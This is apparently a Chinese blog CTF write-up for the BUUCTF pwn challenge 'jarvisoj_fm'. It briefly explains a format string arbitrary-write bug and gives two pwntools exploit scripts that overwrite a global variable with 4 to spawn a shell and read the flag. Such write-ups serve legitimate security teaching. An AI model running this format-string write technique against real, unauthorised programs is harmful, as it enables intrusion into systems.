jarvisoj_fm
jarvisoj_fm
BUUCTF pwn
考点:格式化字符串漏洞
格式化字符串,任意地址写漏洞
将x写为4即可getshell,x的地址为0x0804a02c,调试可得输入的内容位于栈偏移11个单位处
exp
from pwn import *
context(os='linux', arch='i386', log_level='debug')
#p = process('./pwn')
p=remote('node4.buuoj.cn',29551)
x_addr=0x804A02C
payload=p32(x_addr)+b"%11$n"
p.sendline(payload)
p.interactive()
或更通用
#!/usr/bin/env python2
#-*- coding=UTF-8 -*-
from pwn import *
context.log_level = 'debug'
#sh = process('./jarvisoj_fm')
sh = remote('node3.buuoj.cn',26325)
#gdb.attach(sh)
x_addr = 0x0804a02c
#将栈偏移13个单位处的x_addr指针指向的地址内容修改为4
#payload中x_addr写入的位置为栈偏移13处,见下图
#25346225(小端)是栈偏移11,所以2ca00408(小端)是栈偏移11+2=13
payload = '%4c%13$n' + p32(x_addr)
#pause()
sh.sendline(payload)
sh.sendline('cat flag')
sh.interactive()
本文作者:lmarch2
本文链接:https://www.cnblogs.com/imarch22/p/17613913.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步